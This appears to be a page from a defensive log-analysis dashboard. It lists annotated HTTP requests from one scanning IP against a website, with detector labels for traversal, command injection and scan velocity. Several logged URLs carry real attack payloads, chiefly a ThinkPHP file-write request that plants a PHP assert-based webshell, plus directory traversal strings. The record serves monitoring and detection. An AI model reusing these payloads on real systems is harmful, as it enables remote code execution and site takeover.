← Back to IP report

Log Explorer

Fact drill-down for 210.56.49.133

Risk 23 LOW Scope All time All-time facts 168 In-scope 168 Filtered 168 Seen 2024-02-15 → 2024-04-25

Freestyle query (contains)

Time (days, optional)

Page size 25 50 100 200

Apply Reset (all-time)

Active (none) Clear

Faceted filters (facts-based) exact core + snapshot + optional start/end

Annotation facets

Annotator (exact) (any) base — 116 cmdi — 20 sfp — 10 scan_velocity — 10 sqli — 8 trav — 4 Severity (exact) (any) (none) — 120 28 — 12 22 — 10 34 — 6 10 — 6 36 — 4 24 — 4 8 — 4 26 — 2 Label (exact) (any) observed — 116 cmdi — 20 scan_velocity — 10 sensitive_file — 10 sqli — 8 trav — 4

HTTP facets

Method (exact, case-insensitive) (any) GET — 120 POST — 48 HTTP status (exact) (any) 301 — 166 404 — 2

Snapshot facets

Subnet (exact) (any) 210.56.49.0/24 — 168 ASN (exact) (any) 152194 — 168 Country / Region / City (exact)

(any country) Hong Kong — 168 (any region) Kowloon — 168

(any city) Hong Kong — 168

Org contains (ip_org or as_org_name)

Custom time window (optional override)

Provide start/end to scope time explicitly (overrides days). Leave blank for all-time.

Start

End

Tip: keep windows tight when you need speed, but the default is fact-complete.

Top annotators (facts, in-scope)

base 116 cmdi 20 sfp 10 scan_velocity 10 sqli 8 trav 4

Top labels (facts, in-scope)

observed 116 cmdi 20 scan_velocity 10 sensitive_file 10 sqli 8 trav 4

Click a pill to apply it as a filter.

Annotated access events

Showing page 1 / 4 — total 168 rows

← Prev Next →

#1 2024-04-25 15:12:11 event 1146836 POST 301 bytes 169

ann base label observed

Request event observed

/utility/convert/data/config.inc.php

referer

http://www.syndu.com/utility/convert/data/config.inc.php

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.456.0 Safari/534.3

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/utility/convert/data/config.inc.php

referer

http://www.syndu.com/utility/convert/data/config.inc.php

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_3; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.456.0 Safari/534.3

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#2 2024-04-25 15:12:11 event 1146835 POST 301 bytes 169

ann base label observed

Request event observed

/utility/convert/index.php?a=config&source=d7.2_x2.0

referer

http://www.syndu.com/utility/convert/index.php?a=config&source=d7.2_x2.0

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/utility/convert/index.php?a=config&source=d7.2_x2.0

referer

http://www.syndu.com/utility/convert/index.php?a=config&source=d7.2_x2.0

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#3 2024-04-25 15:12:11 event 1146834 GET 301 bytes 169

ann base label observed

Request event observed

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#4 2024-04-25 15:12:11 event 1146833 POST 301 bytes 169

ann base label observed

Request event observed

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#5 2024-04-25 15:12:11 event 1146832 POST 301 bytes 169

ann base label observed

Request event observed

/index.php?s=/home/page/uploadImg

referer

http://www.syndu.com/index.php?s=/home/page/uploadImg

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php?s=/home/page/uploadImg

referer

http://www.syndu.com/index.php?s=/home/page/uploadImg

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0E)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#6 2024-04-25 15:12:11 event 1146834 GET 301 bytes 169

ann sfp 34 label sensitive_file

Request Directory traversal indicator

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

Annotation facts

label

sensitive_file

rule

sfp:traversal

conf

86.00

details

Traversal sequences were present (raw or encoded). Snippet='/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%'

More (full fields + snapshot) expand

url

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

summary

Directory traversal indicator

details

Traversal sequences were present (raw or encoded). Snippet='/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%'

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#7 2024-04-25 15:12:11 event 1146834 GET 301 bytes 169

ann trav 26 label trav

Request Path traversal / LFI indicator detected

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

Annotation facts

label

trav

rule

trav:mixed_separators

conf

90.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#8 2024-04-25 15:12:11 event 1146834 GET 301 bytes 169

ann trav 28 label trav

Request Path traversal / LFI indicator detected

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

Annotation facts

label

trav

rule

trav:dotdot_slash

conf

92.00

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

More (full fields + snapshot) expand

url

/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

referer

http://www.syndu.com/inc/package/work.php?id=../../../../../myoa/attach/approve_center/2210/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.wer

UA

Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7

summary

Path traversal / LFI indicator detected

details

Detected explicit traversal/LFI mechanics (dotdot segments, encoded traversal, local file / stream wrappers, or sensitive file targets). This annotator intentionally does not fire on mere URL depth or on traversal-ish parameter names without mechanics.

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#9 2024-04-25 15:12:11 event 1146833 POST 301 bytes 169

ann scan_velocity 10 label scan_velocity

Request Scan-velocity indicator: scanv:unique_paths

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

Annotation facts

label

scan_velocity

rule

scanv:unique_paths

conf

70.00

details

upm_nonstatic_equiv=28.0; score=2; window=90s; total=56; rpm_equiv=37.3; upm_nonstatic_equiv=28.0; 404=2/56(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

summary

Scan-velocity indicator: scanv:unique_paths

details

upm_nonstatic_equiv=28.0; score=2; window=90s; total=56; rpm_equiv=37.3; upm_nonstatic_equiv=28.0; 404=2/56(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#10 2024-04-25 15:12:11 event 1146833 POST 301 bytes 169

ann scan_velocity 10 label scan_velocity

Request Scan-velocity indicator: scanv:rpm

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

Annotation facts

label

scan_velocity

rule

scanv:rpm

conf

70.00

details

rpm_equiv=37.3; score=2; window=90s; total=56; rpm_equiv=37.3; upm_nonstatic_equiv=28.0; 404=2/56(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

summary

Scan-velocity indicator: scanv:rpm

details

rpm_equiv=37.3; score=2; window=90s; total=56; rpm_equiv=37.3; upm_nonstatic_equiv=28.0; 404=2/56(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#11 2024-04-25 15:12:11 event 1146833 POST 301 bytes 169

ann scan_velocity label scan_velocity

Request Scan-velocity window summary

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

Annotation facts

label

scan_velocity

rule

scanv:window

conf

—

details

window=90s; total=56; rpm_equiv=37.3; upm_nonstatic_equiv=28.0; 404=2/56(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/mobile/api/api.ali.php

referer

http://www.syndu.com/mobile/api/api.ali.php

UA

Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/12.0.702.0 Safari/534.24

summary

Scan-velocity window summary

details

window=90s; total=56; rpm_equiv=37.3; upm_nonstatic_equiv=28.0; 404=2/56(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#12 2024-04-25 15:12:10 event 1146831 GET 301 bytes 169

ann base label observed

Request event observed

/ixosj.php

referer

http://www.syndu.com/ixosj.php

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/ixosj.php

referer

http://www.syndu.com/ixosj.php

UA

Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_4; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.0 Safari/534.16

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#13 2024-04-25 15:12:10 event 1146830 GET 301 bytes 169

ann base label observed

Request event observed

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#14 2024-04-25 15:12:10 event 1146829 POST 301 bytes 169

ann base label observed

Request event observed

/tt.php

referer

http://www.syndu.com/tt.php

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/tt.php

referer

http://www.syndu.com/tt.php

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1b4pre) Gecko/20090401 Firefox/3.5b4pre

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#15 2024-04-25 15:12:10 event 1146828 POST 301 bytes 169

ann base label observed

Request event observed

/utility/convert/data/config.inc.php

referer

http://www.syndu.com/utility/convert/data/config.inc.php

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/utility/convert/data/config.inc.php

referer

http://www.syndu.com/utility/convert/data/config.inc.php

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#16 2024-04-25 15:12:10 event 1146827 POST 301 bytes 169

ann base label observed

Request event observed

/utility/convert/index.php?a=config&source=d7.2_x2.0

referer

http://www.syndu.com/utility/convert/index.php?a=config&source=d7.2_x2.0

UA

Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/utility/convert/index.php?a=config&source=d7.2_x2.0

referer

http://www.syndu.com/utility/convert/index.php?a=config&source=d7.2_x2.0

UA

Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.3.154.6 Safari/525.19

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#17 2024-04-25 15:12:10 event 1146830 GET 301 bytes 169

ann scan_velocity 10 label scan_velocity

Request Scan-velocity indicator: scanv:rpm

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Annotation facts

label

scan_velocity

rule

scanv:rpm

conf

70.00

details

rpm_equiv=35.3; score=1; window=90s; total=53; rpm_equiv=35.3; upm_nonstatic_equiv=26.7; 404=2/53(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

summary

Scan-velocity indicator: scanv:rpm

details

rpm_equiv=35.3; score=1; window=90s; total=53; rpm_equiv=35.3; upm_nonstatic_equiv=26.7; 404=2/53(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#18 2024-04-25 15:12:10 event 1146830 GET 301 bytes 169

ann scan_velocity label scan_velocity

Request Scan-velocity window summary

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Annotation facts

label

scan_velocity

rule

scanv:window

conf

—

details

window=90s; total=53; rpm_equiv=35.3; upm_nonstatic_equiv=26.7; 404=2/53(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

summary

Scan-velocity window summary

details

window=90s; total=53; rpm_equiv=35.3; upm_nonstatic_equiv=26.7; 404=2/53(0.04); ext_hits=0; ua_sig=0; methods=['GET', 'POST']

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#19 2024-04-25 15:12:10 event 1146830 GET 301 bytes 169

ann cmdi 22 label cmdi

Request Command/file-injection indicator: cmdi:pipe_or_redirect

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Annotation facts

label

cmdi

rule

cmdi:pipe_or_redirect

conf

75.00

details

Pipe/redirect operators in a context that resembles command execution. Snippet='/?s=index/\think\template\driver\file/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST["404"]);?>xise404 http://www'

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

summary

Command/file-injection indicator: cmdi:pipe_or_redirect

details

Pipe/redirect operators in a context that resembles command execution. Snippet='/?s=index/\think\template\driver\file/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST["404"]);?>xise404 http://www'

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#20 2024-04-25 15:12:10 event 1146830 GET 301 bytes 169

ann cmdi 28 label cmdi

Request Command/file-injection indicator: cmdi:op_plus_cmd

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Annotation facts

label

cmdi

rule

cmdi:op_plus_cmd

conf

88.00

details

Command separator/operator combined with a recognized command token. Snippet='/?s=index/\think\template\driver\file/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST["404"]);?>xise404 http://www'

More (full fields + snapshot) expand

url

/?s=index/%5Cthink%5Ctemplate%5Cdriver%5Cfile/write&cacheFile=ixosj.php&content=%3C?php%20assert($_REQUEST%5B%22404%22%5D);?%3Exise404

referer

http://www.syndu.com/?s=index/\x5Cthink\x5Ctemplate\x5Cdriver\x5Cfile/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST[\x22404\x22]);?>xise404

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

summary

Command/file-injection indicator: cmdi:op_plus_cmd

details

Command separator/operator combined with a recognized command token. Snippet='/?s=index/\think\template\driver\file/write&cacheFile=ixosj.php&content=<?php assert($_REQUEST["404"]);?>xise404 http://www'

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#21 2024-04-25 15:12:09 event 1146826 POST 301 bytes 169

ann base label observed

Request event observed

/wxapp.php?controller=Goods.doPageUpload

referer

http://www.syndu.com/wxapp.php?controller=Goods.doPageUpload

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wxapp.php?controller=Goods.doPageUpload

referer

http://www.syndu.com/wxapp.php?controller=Goods.doPageUpload

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.2.4) Gecko/20100611 Firefox/3.6.4

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#22 2024-04-25 15:12:09 event 1146825 GET 301 bytes 169

ann base label observed

Request event observed

/wxapp.php

referer

http://www.syndu.com/wxapp.php

UA

Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/wxapp.php

referer

http://www.syndu.com/wxapp.php

UA

Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; tr) AppleWebKit/528.4+ (KHTML, like Gecko) Version/4.0dp1 Safari/526.11.2

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#23 2024-04-25 15:12:09 event 1146824 POST 301 bytes 169

ann base label observed

Request event observed

/index.php/api/Uploadify/preview

referer

http://www.syndu.com/index.php/api/Uploadify/preview

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/index.php/api/Uploadify/preview

referer

http://www.syndu.com/index.php/api/Uploadify/preview

UA

Mozilla/4.0 (Windows; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#24 2024-04-25 15:12:09 event 1146823 GET 301 bytes 169

ann base label observed

Request event observed

/js/Ueditor/net/controller.ashx

referer

http://www.syndu.com/js/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/js/Ueditor/net/controller.ashx

referer

http://www.syndu.com/js/Ueditor/net/controller.ashx

UA

Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

#25 2024-04-25 15:12:09 event 1146822 GET 301 bytes 169

ann base label observed

Request event observed

/static/Ueditor/net/controller.ashx/js/Ueditor/controller.ashx

referer

http://www.syndu.com/static/Ueditor/net/controller.ashx/js/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; el-GR)

Annotation facts

label

observed

rule

base_observed

conf

—

details

—

More (full fields + snapshot) expand

url

/static/Ueditor/net/controller.ashx/js/Ueditor/controller.ashx

referer

http://www.syndu.com/static/Ueditor/net/controller.ashx/js/Ueditor/controller.ashx

UA

Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; el-GR)

summary

event observed

details

—

subnet

210.56.49.0/24

asn

152194 — CTG Server Limited

geo

Hong Kong, Kowloon, Hong Kong

org

Mega II

